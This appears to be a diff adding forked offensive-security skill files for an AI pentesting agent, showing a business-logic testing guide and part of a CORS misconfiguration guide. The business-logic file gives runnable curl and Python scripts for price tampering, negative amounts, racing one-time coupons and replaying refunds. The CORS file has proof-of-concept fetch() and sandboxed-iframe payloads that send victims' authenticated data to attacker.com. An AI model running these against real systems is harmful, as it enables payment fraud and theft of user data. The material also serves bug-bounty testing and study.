- package/skills/offensive/airecon-fork/vulnerabilities-bfla/SKILL.md +156 -0
- package/skills/offensive/airecon-fork/vulnerabilities-blind-xss/SKILL.md +111 -0
- package/skills/offensive/airecon-fork/vulnerabilities-business-logic/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-cors/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-crlf-injection/SKILL.md +146 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf/SKILL.md +200 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf-advanced-bypass/SKILL.md +536 -0
- package/skills/offensive/airecon-fork/vulnerabilities-deserialization/SKILL.md +363 -0
- package/skills/offensive/airecon-fork/vulnerabilities-dom-based-vulnerabilities/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/vulnerabilities-exploitation/SKILL.md +286 -0
- package/skills/offensive/airecon-fork/vulnerabilities-grpc/SKILL.md +123 -0
- package/skills/offensive/airecon-fork/vulnerabilities-host-header-injection/SKILL.md +169 -0
- package/skills/offensive/airecon-fork/vulnerabilities-http-smuggling/SKILL.md +411 -0
- package/skills/offensive/airecon-fork/vulnerabilities-idor/SKILL.md +705 -0
- package/skills/offensive/airecon-fork/vulnerabilities-information-disclosure/SKILL.md +867 -0
- package/skills/offensive/airecon-fork/vulnerabilities-insecure-file-uploads/SKILL.md +190 -0
- package/skills/offensive/airecon-fork/vulnerabilities-jwt-attacks/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/vulnerabilities-kubernetes/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-mass-assignment/SKILL.md +788 -0
- package/skills/offensive/airecon-fork/vulnerabilities-nosql-injection/SKILL.md +204 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-misconfig/SKILL.md +220 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-saml/SKILL.md +163 -0
- package/skills/offensive/airecon-fork/vulnerabilities-open-redirect/SKILL.md +167 -0
- package/skills/offensive/airecon-fork/vulnerabilities-password-reset-poisoning/SKILL.md +66 -0
- package/skills/offensive/airecon-fork/vulnerabilities-path-traversal/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-privilege-escalation/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/vulnerabilities-prototype-pollution/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-race-conditions/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-rce/SKILL.md +240 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sensitive-file-pii-exposure/SKILL.md +589 -0
- package/skills/offensive/airecon-fork/vulnerabilities-spring4shell/SKILL.md +86 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sql-injection/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssrf/SKILL.md +183 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssti/SKILL.md +344 -0
- package/skills/offensive/airecon-fork/vulnerabilities-subdomain-takeover/SKILL.md +160 -0
- package/skills/offensive/airecon-fork/vulnerabilities-supply-chain/SKILL.md +125 -0
- package/skills/offensive/airecon-fork/vulnerabilities-unhandled-exception-differential/SKILL.md +742 -0
- package/skills/offensive/airecon-fork/vulnerabilities-waf-detection/SKILL.md +90 -0
- package/skills/offensive/airecon-fork/vulnerabilities-web-cache-poisoning/SKILL.md +233 -0
- package/skills/offensive/airecon-fork/vulnerabilities-websocket/SKILL.md +180 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xss/SKILL.md +316 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xxe/SKILL.md +222 -0
|
@@ -0,0 +1,313 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
---
|
|
4
|
+
name: business-logic
|
|
5
|
+
description: Business logic testing for workflow bypass, state manipulation, and domain invariant violations
|
|
6
|
+
---
|
|
7
|
+
|
|
8
|
+
# Business Logic Flaws
|
|
9
|
+
|
|
10
|
+
Business logic flaws exploit intended functionality to violate domain invariants: move money without paying, exceed limits, retain privileges, or bypass reviews. They require a model of the business, not just payloads.
|
|
11
|
+
|
|
12
|
+
## Attack Surface
|
|
13
|
+
|
|
14
|
+
- Financial logic: pricing, discounts, payments, refunds, credits, chargebacks
|
|
15
|
+
- Account lifecycle: signup, upgrade/downgrade, trial, suspension, deletion
|
|
16
|
+
- Authorization-by-logic: feature gates, role transitions, approval workflows
|
|
17
|
+
- Quotas/limits: rate/usage limits, inventory, entitlements, seat licensing
|
|
18
|
+
- Multi-tenant isolation: cross-organization data or action bleed
|
|
19
|
+
- Event-driven flows: jobs, webhooks, sagas, compensations, idempotency
|
|
20
|
+
|
|
21
|
+
## High-Value Targets
|
|
22
|
+
|
|
23
|
+
- Pricing/cart: price locks, quote to order, tax/shipping computation
|
|
24
|
+
- Discount engines: stacking, mutual exclusivity, scope (cart vs item), once-per-user enforcement
|
|
25
|
+
- Payments: auth/capture/void/refund sequences, partials, split tenders, chargebacks, idempotency keys
|
|
26
|
+
- Credits/gift cards/vouchers: issuance, redemption, reversal, expiry, transferability
|
|
27
|
+
- Subscriptions: proration, upgrade/downgrade, trial extension, seat counts, meter reporting
|
|
28
|
+
- Refunds/returns/RMAs: multi-item partials, restocking fees, return window edges
|
|
29
|
+
- Admin/staff operations: impersonation, manual adjustments, credit/refund issuance, account flags
|
|
30
|
+
- Quotas/limits: daily/monthly usage, inventory reservations, feature usage counters
|
|
31
|
+
|
|
32
|
+
## Reconnaissance
|
|
33
|
+
|
|
34
|
+
### Workflow Mapping
|
|
35
|
+
|
|
36
|
+
- Derive endpoints from the UI and proxy/network logs; map hidden/undocumented API calls, especially finalize/confirm endpoints
|
|
37
|
+
- Identify tokens/flags: stepToken, paymentIntentId, orderStatus, reviewState, approvalId; test reuse across users/sessions
|
|
38
|
+
- Document invariants: conservation of value (ledger balance), uniqueness (idempotency), monotonicity (non-decreasing counters), exclusivity (one active subscription)
|
|
39
|
+
|
|
40
|
+
### Input Surface
|
|
41
|
+
|
|
42
|
+
- Hidden fields and client-computed totals; server must recompute on trusted sources
|
|
43
|
+
- Alternate encodings and shapes: arrays instead of scalars, objects with unexpected keys, null/empty/0/negative, scientific notation
|
|
44
|
+
- Business selectors: currency, locale, timezone, tax region; vary to trigger rounding and ruleset changes
|
|
45
|
+
|
|
46
|
+
### State and Time Axes
|
|
47
|
+
|
|
48
|
+
- Replays: resubmit stale finalize/confirm requests
|
|
49
|
+
- Out-of-order: call finalize before verify; refund before capture; cancel after ship
|
|
50
|
+
- Time windows: end-of-day/month cutovers, daylight saving, grace periods, trial expiry edges
|
|
51
|
+
|
|
52
|
+
## Key Vulnerabilities
|
|
53
|
+
|
|
54
|
+
### State Machine Abuse
|
|
55
|
+
|
|
56
|
+
- Skip or reorder steps via direct API calls; verify server enforces preconditions on each transition
|
|
57
|
+
- Replay prior steps with altered parameters (e.g., swap price after approval but before capture)
|
|
58
|
+
- Split a single constrained action into many sub-actions under the threshold (limit slicing)
|
|
59
|
+
|
|
60
|
+
### Concurrency and Idempotency
|
|
61
|
+
|
|
62
|
+
- Parallelize identical operations to bypass atomic checks (create, apply, redeem, transfer)
|
|
63
|
+
- Abuse idempotency: key scoped to path but not principal → reuse other users' keys; or idempotency stored only in cache
|
|
64
|
+
- Message reprocessing: queue workers re-run tasks on retry without idempotent guards; cause duplicate fulfillment/refund
|
|
65
|
+
|
|
66
|
+
### Numeric and Currency
|
|
67
|
+
|
|
68
|
+
- Floating point vs decimal rounding; rounding/truncation favoring attacker at boundaries
|
|
69
|
+
- Cross-currency arbitrage: buy in currency A, refund in B at stale rates; tax rounding per-item vs per-order
|
|
70
|
+
- Negative amounts, zero-price, free shipping thresholds, minimum/maximum guardrails
|
|
71
|
+
|
|
72
|
+
### Quotas, Limits, and Inventory
|
|
73
|
+
|
|
74
|
+
- Off-by-one and time-bound resets (UTC vs local); pre-warm at T-1s and post-fire at T+1s
|
|
75
|
+
- Reservation/hold leaks: reserve multiple, complete one, release not enforced; backorder logic inconsistencies
|
|
76
|
+
- Distributed counters without strong consistency enabling double-consumption
|
|
77
|
+
|
|
78
|
+
### Refunds and Chargebacks
|
|
79
|
+
|
|
80
|
+
- Double-refund: refund via UI and support tool; refund partials summing above captured amount
|
|
81
|
+
- Refund after benefits consumed (downloaded digital goods, shipped items) due to missing post-consumption checks
|
|
82
|
+
|
|
83
|
+
### Feature Gates and Roles
|
|
84
|
+
|
|
85
|
+
- Feature flags enforced client-side or at edge but not in core services; toggle names guessed or fallback to default-enabled
|
|
86
|
+
- Role transitions leaving stale capabilities (retain premium after downgrade; retain admin endpoints after demotion)
|
|
87
|
+
|
|
88
|
+
## Advanced Techniques
|
|
89
|
+
|
|
90
|
+
### Event-Driven Sagas
|
|
91
|
+
|
|
92
|
+
- Saga/compensation gaps: trigger compensation without original success; or execute success twice without compensation
|
|
93
|
+
- Outbox/Inbox patterns missing idempotency → duplicate downstream side effects
|
|
94
|
+
- Cron/backfill jobs operating outside request-time authorization; mutate state broadly
|
|
95
|
+
|
|
96
|
+
### Microservices Boundaries
|
|
97
|
+
|
|
98
|
+
- Cross-service assumption mismatch: one service validates total, another trusts line items; alter between calls
|
|
99
|
+
- Header trust: internal services trusting X-Role or X-User-Id from untrusted edges
|
|
100
|
+
- Partial failure windows: two-phase actions where phase 1 commits without phase 2, leaving exploitable intermediate state
|
|
101
|
+
|
|
102
|
+
### Multi-Tenant Isolation
|
|
103
|
+
|
|
104
|
+
- Tenant-scoped counters and credits updated without tenant key in the where-clause; leak across orgs
|
|
105
|
+
- Admin aggregate views allowing actions that impact other tenants due to missing per-tenant enforcement
|
|
106
|
+
|
|
107
|
+
## Bypass Techniques
|
|
108
|
+
|
|
109
|
+
- Content-type switching (JSON/form/multipart) to hit different code paths
|
|
110
|
+
- Method alternation (GET performing state change; overrides via X-HTTP-Method-Override)
|
|
111
|
+
- Client recomputation: totals, taxes, discounts computed on client and accepted by server
|
|
112
|
+
- Cache/gateway differentials: stale decisions from CDN/APIM that are not identity-aware
|
|
113
|
+
|
|
114
|
+
## Special Contexts
|
|
115
|
+
|
|
116
|
+
### E-commerce
|
|
117
|
+
|
|
118
|
+
- Stack incompatible discounts via parallel apply; remove qualifying item after discount applied; retain free shipping after cart changes
|
|
119
|
+
- Modify shipping tier post-quote; abuse returns to keep product and refund
|
|
120
|
+
|
|
121
|
+
### Banking/Fintech
|
|
122
|
+
|
|
123
|
+
- Split transfers to bypass per-transaction threshold; schedule vs instant path inconsistencies
|
|
124
|
+
- Exploit grace periods on holds/authorizations to withdraw again before settlement
|
|
125
|
+
|
|
126
|
+
### SaaS/B2B
|
|
127
|
+
|
|
128
|
+
- Seat licensing: race seat assignment to exceed purchased seats; stale license checks in background tasks
|
|
129
|
+
- Usage metering: report late or duplicate usage to avoid billing or to over-consume
|
|
130
|
+
|
|
131
|
+
## Chaining Attacks
|
|
132
|
+
|
|
133
|
+
- Business logic + race: duplicate benefits before state updates
|
|
134
|
+
- Business logic + IDOR: operate on others' resources once a workflow leak reveals IDs
|
|
135
|
+
- Business logic + CSRF: force a victim to complete a sensitive step sequence
|
|
136
|
+
|
|
137
|
+
## Concrete Testing Procedures
|
|
138
|
+
|
|
139
|
+
### Step 1: Map the Workflow with Caido + browser_action
|
|
140
|
+
|
|
141
|
+
**1a. Start Caido and route all traffic through it (do this ONCE per engagement):**
|
|
142
|
+
|
|
143
|
+
caido-setup
|
|
144
|
+
TOKEN="<bearer token from caido-setup output>"
|
|
145
|
+
|
|
146
|
+
**1b. Perform the full workflow in browser_action (Caido captures everything automatically):**
|
|
147
|
+
|
|
148
|
+
# browser_action: goto https://target.com → login → add to cart → checkout → pay
|
|
149
|
+
# All requests are captured in Caido history automatically
|
|
150
|
+
|
|
151
|
+
**1c. Query Caido to extract the full workflow request sequence:**
|
|
152
|
+
|
|
153
|
+
# Extract all requests to the target host, ordered by time
|
|
154
|
+
curl -sL -X POST http://127.0.0.1:48080/graphql \
|
|
155
|
+
-H "Content-Type: application/json" \
|
|
156
|
+
-H "Authorization: Bearer $TOKEN" \
|
|
157
|
+
-d '{"query":"query { requestsByOffset(limit:100, filter:{httpql:\"host.eq:target.com\"}) { edges { node { id method path query body response { statusCode length } } } count } }"}' \
|
|
158
|
+
| jq '.data.requestsByOffset.edges[].node | "\(.method) \(.path) → \(.response.statusCode)"' \
|
|
159
|
+
| tee output/workflow_map.txt
|
|
160
|
+
|
|
161
|
+
# Look for the state machine sequence:
|
|
162
|
+
# POST /api/cart/add → 200
|
|
163
|
+
# POST /api/checkout/init → 200 (step token issued here)
|
|
164
|
+
# POST /api/payment/confirm → 200 (final commit)
|
|
165
|
+
|
|
166
|
+
**1d. Extract raw request body for each critical step:**
|
|
167
|
+
|
|
168
|
+
# Get the full raw request for a specific step (use ID from workflow_map.txt)
|
|
169
|
+
REQUEST_ID="<id from step above>"
|
|
170
|
+
curl -sL -X POST http://127.0.0.1:48080/graphql \
|
|
171
|
+
-H "Content-Type: application/json" \
|
|
172
|
+
-H "Authorization: Bearer $TOKEN" \
|
|
173
|
+
-d "{\"query\":\"{ request(id:\\\"$REQUEST_ID\\\") { raw response { raw statusCode } } }\"}" \
|
|
174
|
+
| jq '.data.request.raw' | base64 -d | tee output/step_raw_request.txt
|
|
175
|
+
|
|
176
|
+
# Save step tokens, order IDs, payment intent IDs for manipulation in Steps 2-7
|
|
177
|
+
|
|
178
|
+
### Step 2: Test State Machine — Skip Steps Directly
|
|
179
|
+
|
|
180
|
+
# Try calling final step (confirm) without completing earlier steps (init)
|
|
181
|
+
# Replace step tokens with valid session but NO prior initialization
|
|
182
|
+
curl -s -X POST https://target.com/api/checkout/confirm \
|
|
183
|
+
-H "Content-Type: application/json" \
|
|
184
|
+
-H "Cookie: session=<session>" \
|
|
185
|
+
-d '{"order_id":"12345","amount":0}' | tee output/state_skip_test.txt
|
|
186
|
+
|
|
187
|
+
# Check: does the server reject this, or does it process a $0 order?
|
|
188
|
+
# SUCCESS (vuln): 200 OK or order created without proper validation
|
|
189
|
+
|
|
190
|
+
### Step 3: Test Price/Amount Manipulation
|
|
191
|
+
|
|
192
|
+
# Intercept cart request and replace server-sent price with 1 cent
|
|
193
|
+
curl -s -X POST https://target.com/api/cart/checkout \
|
|
194
|
+
-H "Content-Type: application/json" \
|
|
195
|
+
-H "Cookie: session=<session>" \
|
|
196
|
+
-d '{"items":[{"id":"prod_123","qty":1,"price":0.01}]}' | tee output/price_tamper.txt
|
|
197
|
+
|
|
198
|
+
# Also test negative amounts:
|
|
199
|
+
curl -s -X POST https://target.com/api/cart/checkout \
|
|
200
|
+
-H "Content-Type: application/json" \
|
|
201
|
+
-H "Cookie: session=<session>" \
|
|
202
|
+
-d '{"items":[{"id":"prod_123","qty":1,"price":-9999}]}' | tee output/negative_price.txt
|
|
203
|
+
|
|
204
|
+
### Step 4: Test Race Condition (Double-Spend / Double-Redeem)
|
|
205
|
+
|
|
206
|
+
# Use parallel curl calls to race a one-time coupon or limited resource
|
|
207
|
+
# Bash parallel execution:
|
|
208
|
+
for i in $(seq 1 20); do
|
|
209
|
+
curl -s -X POST https://target.com/api/coupon/redeem \
|
|
210
|
+
-H "Content-Type: application/json" \
|
|
211
|
+
-H "Cookie: session=<session>" \
|
|
212
|
+
-d '{"code":"PROMO10"}' &
|
|
213
|
+
done
|
|
214
|
+
wait | tee output/race_condition_test.txt
|
|
215
|
+
# Count successful responses: grep -c '"success":true' output/race_condition_test.txt
|
|
216
|
+
# If >1 success → race condition confirmed
|
|
217
|
+
|
|
218
|
+
# Python concurrent version (more reliable):
|
|
219
|
+
python3 -c "
|
|
220
|
+
import requests, concurrent.futures, json
|
|
221
|
+
URL = 'https://target.com/api/coupon/redeem'
|
|
222
|
+
HEADERS = {'Cookie': 'session=<session>', 'Content-Type': 'application/json'}
|
|
223
|
+
DATA = json.dumps({'code': 'PROMO10'})
|
|
224
|
+
def redeem(_): return requests.post(URL, headers=HEADERS, data=DATA, timeout=5)
|
|
225
|
+
with concurrent.futures.ThreadPoolExecutor(max_workers=20) as ex:
|
|
226
|
+
results = list(ex.map(redeem, range(20)))
|
|
227
|
+
successes = [r.text for r in results if r.status_code == 200]
|
|
228
|
+
print(f'Successes: {len(successes)}')
|
|
229
|
+
print(successes[:3])
|
|
230
|
+
" | tee output/race_condition_python.txt
|
|
231
|
+
|
|
232
|
+
### Step 5: Test Refund Abuse
|
|
233
|
+
|
|
234
|
+
# Step 1: Make a purchase, note order_id
|
|
235
|
+
# Step 2: Submit refund via UI → note refund_id
|
|
236
|
+
# Step 3: Replay same refund request (idempotency test)
|
|
237
|
+
REFUND_ID=$(cat output/refund_id.txt)
|
|
238
|
+
curl -s -X POST https://target.com/api/refund \
|
|
239
|
+
-H "Cookie: session=<session>" \
|
|
240
|
+
-d "{\"order_id\":\"$ORDER_ID\",\"amount\":50}" | tee output/refund_test1.txt
|
|
241
|
+
# Replay same request with same idempotency key:
|
|
242
|
+
curl -s -X POST https://target.com/api/refund \
|
|
243
|
+
-H "Cookie: session=<session>" \
|
|
244
|
+
-d "{\"order_id\":\"$ORDER_ID\",\"amount\":50}" | tee output/refund_test2.txt
|
|
245
|
+
# Check: does second refund succeed? If yes → double refund vulnerability
|
|
246
|
+
|
|
247
|
+
### Step 6: Test Quota/Limit Bypass
|
|
248
|
+
|
|
249
|
+
# Test off-by-one at quota boundary (e.g., free tier = 10 API calls/day)
|
|
250
|
+
for i in $(seq 1 12); do
|
|
251
|
+
STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
|
|
252
|
+
-H "Cookie: session=<session>" \
|
|
253
|
+
https://target.com/api/limited_endpoint)
|
|
254
|
+
echo "Call $i: $STATUS"
|
|
255
|
+
done | tee output/quota_test.txt
|
|
256
|
+
# After quota hit (429), test if resetting session or using different header bypasses:
|
|
257
|
+
curl -s -X GET https://target.com/api/limited_endpoint \
|
|
258
|
+
-H "Cookie: session=<new_session_same_account>" | tee output/quota_bypass.txt
|
|
259
|
+
|
|
260
|
+
### Step 7: Verify Persistence (MANDATORY before reporting)
|
|
261
|
+
|
|
262
|
+
# After exploit attempt, verify state change persisted in authoritative source
|
|
263
|
+
# Check account balance / order history / credit balance:
|
|
264
|
+
curl -s https://target.com/api/account/balance \
|
|
265
|
+
-H "Cookie: session=<session>" | tee output/balance_verify.txt
|
|
266
|
+
curl -s https://target.com/api/orders?limit=5 \
|
|
267
|
+
-H "Cookie: session=<session>" | tee output/orders_verify.txt
|
|
268
|
+
# ONLY report if you can show DURABLE state change (e.g., negative balance, extra refund shown in history)
|
|
269
|
+
|
|
270
|
+
## Testing Methodology
|
|
271
|
+
|
|
272
|
+
1. **Enumerate state machine** - Per critical workflow (states, transitions, pre/post-conditions); note invariants
|
|
273
|
+
2. **Build Actor × Action × Resource matrix** - Unauth, basic user, premium, staff/admin; identify actions per role
|
|
274
|
+
3. **Test transitions** - Step skipping, repetition, reordering, late mutation (use curl commands from Step 2-3 above)
|
|
275
|
+
4. **Introduce variance** - Time, concurrency, channel (mobile/web/API/GraphQL), content-types (use race tests from Step 4)
|
|
276
|
+
5. **Validate persistence boundaries** - All services, queues, and jobs re-enforce invariants (use Step 7 verification)
|
|
277
|
+
|
|
278
|
+
## Validation
|
|
279
|
+
|
|
280
|
+
1. Show an invariant violation (e.g., two refunds for one charge, negative inventory, exceeding quotas)
|
|
281
|
+
2. Provide side-by-side evidence for intended vs abused flows with the same principal
|
|
282
|
+
3. Demonstrate durability: the undesired state persists and is observable in authoritative sources (ledger, emails, admin views)
|
|
283
|
+
4. Quantify impact per action and at scale (unit loss × feasible repetitions)
|
|
284
|
+
|
|
285
|
+
## False Positives
|
|
286
|
+
|
|
287
|
+
- Promotional behavior explicitly allowed by policy (documented free trials, goodwill credits)
|
|
288
|
+
- Visual-only inconsistencies with no durable or exploitable state change
|
|
289
|
+
- Admin-only operations with proper audit and approvals
|
|
290
|
+
|
|
291
|
+
## Impact
|
|
292
|
+
|
|
293
|
+
- Direct financial loss (fraud, arbitrage, over-refunds, unpaid consumption)
|
|
294
|
+
- Regulatory/contractual violations (billing accuracy, consumer protection)
|
|
295
|
+
- Denial of inventory/services to legitimate users through resource exhaustion
|
|
296
|
+
- Privilege retention or unauthorized access to premium features
|
|
297
|
+
|
|
298
|
+
## Pro Tips
|
|
299
|
+
|
|
300
|
+
1. Start from invariants and ledgers, not UI—prove conservation of value breaks
|
|
301
|
+
2. Test with time and concurrency; many bugs only appear under pressure
|
|
302
|
+
3. Recompute totals server-side; never accept client math—flag when you observe otherwise
|
|
303
|
+
4. Treat idempotency and retries as first-class: verify key scope and persistence
|
|
304
|
+
5. Probe background workers and webhooks separately; they often skip auth and rule checks
|
|
305
|
+
6. Validate role/feature gates at the service that mutates state, not only at the edge
|
|
306
|
+
7. Explore end-of-period edges (month-end, trial end, DST) for rounding and window issues
|
|
307
|
+
8. Use minimal, auditable PoCs that demonstrate durable state change and exact loss
|
|
308
|
+
9. Chain with authorization tests (IDOR/Function-level access) to magnify impact
|
|
309
|
+
10. When in doubt, map the state machine; gaps appear where transitions lack server-side guards
|
|
310
|
+
|
|
311
|
+
## Summary
|
|
312
|
+
|
|
313
|
+
Business logic security is the enforcement of domain invariants under adversarial sequencing, timing, and inputs. If any step trusts the client or prior steps, expect abuse.
|
|
@@ -0,0 +1,242 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
---
|
|
4
|
+
name: cors
|
|
5
|
+
description: CORS misconfiguration testing covering origin reflection, null origin bypass, trusted subdomain abuse, pre-flight bypass, and credential-bearing cross-origin requests
|
|
6
|
+
---
|
|
7
|
+
|
|
8
|
+
# CORS Misconfiguration Testing
|
|
9
|
+
|
|
10
|
+
CORS misconfigurations are one of the most common bug bounty findings. A misconfigured CORS policy allows attacker-controlled origins to make authenticated cross-origin requests, stealing sensitive data including tokens, credentials, and PII.
|
|
11
|
+
|
|
12
|
+
---
|
|
13
|
+
|
|
14
|
+
## Core Concepts
|
|
15
|
+
|
|
16
|
+
CORS headers that matter for security:
|
|
17
|
+
|
|
18
|
+
Access-Control-Allow-Origin: https://trusted.com # Which origins allowed
|
|
19
|
+
Access-Control-Allow-Credentials: true # Cookies/auth sent cross-origin
|
|
20
|
+
Access-Control-Allow-Methods: GET, POST, PUT # Allowed HTTP methods
|
|
21
|
+
Access-Control-Allow-Headers: Authorization, X-Custom # Allowed request headers
|
|
22
|
+
Access-Control-Expose-Headers: X-Custom-Header # Headers JS can read
|
|
23
|
+
|
|
24
|
+
**Exploitable condition:** `ACAO: <attacker>` + `ACAC: true`
|
|
25
|
+
→ Attacker can make authenticated request from their origin and read response.
|
|
26
|
+
|
|
27
|
+
---
|
|
28
|
+
|
|
29
|
+
## Identifying CORS Policy
|
|
30
|
+
|
|
31
|
+
# Send request with custom Origin header — observe ACAO response header:
|
|
32
|
+
curl -s -I <target>/api/user \
|
|
33
|
+
-H "Origin: https://attacker.com" \
|
|
34
|
+
-H "Cookie: session=<your_token>"
|
|
35
|
+
|
|
36
|
+
# Check response:
|
|
37
|
+
# Access-Control-Allow-Origin: https://attacker.com → reflected (VULNERABLE)
|
|
38
|
+
# Access-Control-Allow-Origin: * → wildcard (no creds)
|
|
39
|
+
# Access-Control-Allow-Origin: https://target.com → strict (safe)
|
|
40
|
+
# (missing header) → no CORS config
|
|
41
|
+
|
|
42
|
+
---
|
|
43
|
+
|
|
44
|
+
## Vulnerability Patterns
|
|
45
|
+
|
|
46
|
+
### 1. Origin Reflection
|
|
47
|
+
|
|
48
|
+
Server blindly reflects any Origin header:
|
|
49
|
+
|
|
50
|
+
curl -s <target>/api/profile \
|
|
51
|
+
-H "Origin: https://evil.com" \
|
|
52
|
+
-H "Cookie: <auth>"
|
|
53
|
+
# Response: Access-Control-Allow-Origin: https://evil.com
|
|
54
|
+
# Access-Control-Allow-Credentials: true
|
|
55
|
+
|
|
56
|
+
# Exploit PoC:
|
|
57
|
+
<script>
|
|
58
|
+
fetch('https://<target>/api/profile', {
|
|
59
|
+
credentials: 'include'
|
|
60
|
+
})
|
|
61
|
+
.then(r => r.text())
|
|
62
|
+
.then(d => fetch('https://attacker.com/?data=' + btoa(d)));
|
|
63
|
+
</script>
|
|
64
|
+
|
|
65
|
+
### 2. Prefix/Suffix Match Bypass
|
|
66
|
+
|
|
67
|
+
Regex-based origin validation with anchoring bugs:
|
|
68
|
+
|
|
69
|
+
# Target trusts: *.target.com
|
|
70
|
+
# Bypass: target.com.attacker.com — passes if regex is /target\.com/
|
|
71
|
+
curl -H "Origin: https://target.com.attacker.com" <target>/api/
|
|
72
|
+
|
|
73
|
+
# Trusts: /^https:\/\/target\.com/ (missing end anchor)
|
|
74
|
+
# Bypass: https://target.com.attacker.com
|
|
75
|
+
# Bypass: https://target.com.evil.com
|
|
76
|
+
|
|
77
|
+
# Trusts: /target\.com$/ (missing start anchor)
|
|
78
|
+
# Bypass: https://notarget.com
|
|
79
|
+
|
|
80
|
+
### 3. Null Origin
|
|
81
|
+
|
|
82
|
+
# null origin is sent by: sandboxed iframes, local files, data: URIs
|
|
83
|
+
curl -s <target>/api/ -H "Origin: null" -H "Cookie: <auth>"
|
|
84
|
+
# If ACAO: null → exploitable via sandboxed iframe:
|
|
85
|
+
|
|
86
|
+
# Exploit:
|
|
87
|
+
<iframe sandbox="allow-scripts allow-top-navigation allow-forms"
|
|
88
|
+
srcdoc="<script>
|
|
89
|
+
fetch('https://<target>/api/user', {credentials: 'include'})
|
|
90
|
+
.then(r=>r.text())
|
|
91
|
+
.then(d=>top.location='https://attacker.com/?='+btoa(d))
|
|
92
|
+
</script>">
|
|
93
|
+
</iframe>
|
|
94
|
+
|
|
95
|
+
### 4. Subdomain Takeover + CORS
|
|
96
|
+
|
|
97
|
+
If target trusts `*.target.com` and one subdomain is taken over:
|
|
98
|
+
|
|
99
|
+
# 1. Find dangling subdomain: legacy.target.com → CNAME → unclaimed hosting
|
|
100
|
+
# 2. Take over the subdomain (GitHub Pages, Netlify, etc.)
|
|
101
|
+
# 3. Host exploit from legacy.target.com
|
|
102
|
+
# 4. CORS policy trusts *.target.com → steal authenticated data
|
|
103
|
+
|
|
104
|
+
### 5. HTTP Origin on HTTPS Target
|
|
105
|
+
|
|
106
|
+
# Some servers accept http:// origin on https:// target:
|
|
107
|
+
curl -s https://<target>/api/ -H "Origin: http://attacker.com"
|
|
108
|
+
# If ACAO: http://attacker.com + ACAC: true → downgrade attack
|
|
109
|
+
|
|
110
|
+
### 6. Trusted Third-Party Origin
|
|
111
|
+
|
|
112
|
+
# If target trusts a third-party you can inject into:
|
|
113
|
+
Access-Control-Allow-Origin: https://trusted-partner.com
|
|
114
|
+
# → XSS on trusted-partner.com enables CORS exploit chain
|
|
115
|
+
|
|
116
|
+
---
|
|
117
|
+
|
|
118
|
+
## Testing All API Endpoints
|
|
119
|
+
|
|
120
|
+
# Test multiple CORS-sensitive endpoints:
|
|
121
|
+
for path in /api/user /api/profile /api/account /api/me /api/settings \
|
|
122
|
+
/api/tokens /api/keys /api/admin /v1/user /v2/me; do
|
|
123
|
+
echo "--- $path ---"
|
|
124
|
+
curl -s -I https://<target>$path \
|
|
125
|
+
-H "Origin: https://evil.com" \
|
|
126
|
+
-H "Cookie: <auth>" 2>/dev/null | grep -i "access-control"
|
|
127
|
+
done
|
|
128
|
+
|
|
129
|
+
---
|
|
130
|
+
|
|
131
|
+
## Pre-flight Request Testing
|
|
132
|
+
|
|
133
|
+
For non-simple requests (custom headers, PUT/DELETE), browser sends OPTIONS:
|
|
134
|
+
|
|
135
|
+
# Test pre-flight:
|
|
136
|
+
curl -X OPTIONS <target>/api/ \
|
|
137
|
+
-H "Origin: https://evil.com" \
|
|
138
|
+
-H "Access-Control-Request-Method: DELETE" \
|
|
139
|
+
-H "Access-Control-Request-Headers: X-Custom-Header" \
|
|
140
|
+
-v 2>&1 | grep -i "access-control"
|
|
141
|
+
|
|
142
|
+
# Check if pre-flight allows dangerous methods:
|
|
143
|
+
# Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH
|
|
144
|
+
# + reflected origin + credentials = can perform any method cross-origin
|
|
145
|
+
|
|
146
|
+
---
|
|
147
|
+
|
|
148
|
+
## Impact Assessment
|
|
149
|
+
|
|
150
|
+
| CORS Config | Credentials? | Exploitable? | Impact |
|
|
151
|
+
|-------------|-------------|-------------|--------|
|
|
152
|
+
| ACAO: * | No (forbidden with creds) | Partial | Low (no auth) |
|
|
153
|
+
| ACAO: * + ACAC: true | N/A (invalid) | No | — |
|
|
154
|
+
| ACAO: reflected | Yes | YES | Critical |
|
|
155
|
+
| ACAO: null | Yes | YES (sandboxed iframe) | High |
|
|
156
|
+
| ACAO: *.domain | Yes | YES (subdomain takeover) | High |
|
|
157
|
+
| ACAO: http:// on https | Yes | YES (MITM required) | Medium |
|
|
158
|
+
|
|
159
|
+
---
|
|
160
|
+
|
|
161
|
+
## CORS with JWT (No Cookie Auth)
|
|
162
|
+
|
|
163
|
+
If app uses Bearer tokens instead of cookies:
|
|
164
|
+
|
|
165
|
+
# ACAO: * + Bearer token auth = less impactful (attacker needs the token)
|
|
166
|
+
# But: if token is in localStorage and XSS exists → read token + make CORS request
|
|
167
|
+
|
|
168
|
+
# ACAO reflected + credentials: false → still useful with XSS to exfiltrate data
|
|
169
|
+
|
|
170
|
+
---
|
|
171
|
+
|
